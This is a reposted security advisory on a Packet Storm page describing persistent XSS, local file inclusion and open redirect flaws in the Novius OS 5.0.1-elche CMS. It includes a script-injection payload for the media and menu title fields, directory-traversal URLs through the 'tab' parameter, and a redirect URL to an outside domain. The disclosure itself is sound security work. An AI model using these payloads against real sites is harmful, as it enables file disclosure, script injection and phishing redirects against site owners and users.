exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Novius OS 5.0.1-elche XSS / LFI / Open Redirect

Novius OS 5.0.1-elche XSS / LFI / Open Redirect
Posted Jun 29, 2015
Authored by hyp3rlinx | Site hyp3rlinx.altervista.org

Novius OS version 5.0.1-elche suffers from cross site scripting, local file inclusion, and open redirection vulnerabilities.

tags | exploit, local, vulnerability, xss, file inclusion
advisories | CVE-2015-5354, CVE-2015-5353
SHA-256 | f4fd9696fbbf3cb4bb30f39d3adbbe123d467ec115259459a177a9cf9bd7f1e9

Novius OS 5.0.1-elche XSS / LFI / Open Redirect

Change Mirror Download
[+] Credits: John Page ( hyp3rlinx )

[+] Domains: hyp3rlinx.altervista.org

[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-NOVIUSOS0629.txt



Vendor:
=======================
community.novius-os.org


Product:
===============================================================
novius-os.5.0.1-elche is a PHP Based Content Management System
community.novius-os.org/developpers/download.html



Advisory Information:
===================================
Persistent XSS, LFI & Open Redirect



Vulnerability Details:
======================

Persistent XSS:
---------------
Users can inject XSS payloads that will be saved to MySQL DB, where they
will execute each time when accessed.

1- In Admin under 'Media Center' users can inject XSS payloads and save to
the 'media_title' field for a saved media file,
create a new media page inject payload click save and then select
visualize.

2- Under Website menus area users can inject XSS payloads and save for the
'menu_title' field for a Website menu.

If we view browser source code at
http://localhost/novius-os.5.0.1-elche/novius-os/?_preview
the XSS is output to its HTML entities.

e.g.
<title><script>alert('HELL')</script></title>

But within the same webpage for <h1> tag you can see it is not.

e.g.
<div id="block-grid" class=" customisable col-md-12 col-sm-12 col-xs-12
main_wysiwyg"><h1 id="pagename"><script>alert('HELL')</script></h1>


Local File Inclusion:
---------------------
We can directory traverse access and read files outside of the current
working directory in the Admin area by abusing the 'tab' parameter.
http://localhost/novius-os.5.0.1-elche/novius-os/admin/?tab=../../../../



Open Redirect:
--------------
http://localhost/novius-os.5.0.1-elche/novius-os/admin/nos/login?redirect=
is open to abuse by supplying an malicious a location or file.



XSS Exploit code(s):
====================
In 'Media Center' create a new media file, click edit and inject XSS
payload for the 'title' field click save and then select visualize.
http://localhost/novius-os.5.0.1-elche/novius-os/admin/?tab=admin/noviusos_media/media/insert_update/1

vulnerable parameter:
media_title

In 'Website Menu' create a new website menu item and inject XSS payload
click save and then select visualize.
http://localhost/novius-os.5.0.1-elche/novius-os/admin/?tab=admin/noviusos_menu/menu/crud/insert_update%3Fcontext%3Dmain%253A%253Aen_GB
http://localhost/novius-os.5.0.1-elche/novius-os/?_preview=1

vulnerable parameter:
menu_title



LFI:
----
http://localhost/novius-os.5.0.1-elche/novius-os/admin/?tab=../../../SENSITIVE-FILE.txt

http://localhost/novius-os.5.0.1-elche/novius-os/admin/?tab=../../../../xampp/phpinfo.php



Open Redirect:
--------------
http://localhost/novius-os.5.0.1-elche/novius-os/admin/nos/login?redirect=http://www.SATANSBRONZEBABYSHOES.com



Disclosure Timeline:
======================================
Vendor Notification: NA
June 29, 2015 : Public Disclosure



Severity Level:
=================
Med



Description:
=================================================================================

Request Method(s): [+] GET & POST


Vulnerable Product: [+] novius-os.5.0.1-elche


Vulnerable Parameter(s): [+] media_title, menu_title, tab, redirect


Affected Area(s): [+] Login, Web Pages, Media Center & Website
Menu area


==================================================================================

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that
it is not altered except by reformatting it, and that due credit is given.
Permission is
explicitly given for insertion in vulnerability databases and similar,
provided that
due credit is given to the author. The author is not responsible for any
misuse of the
information contained herein and prohibits any malicious use of all
security related
information or exploits by the author or elsewhere.


(hyp3rlinx)
Login or Register to add favorites

File Archive:

October 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    10 Files
  • 2
    Oct 2nd
    0 Files
  • 3
    Oct 3rd
    0 Files
  • 4
    Oct 4th
    0 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    0 Files
  • 8
    Oct 8th
    0 Files
  • 9
    Oct 9th
    0 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close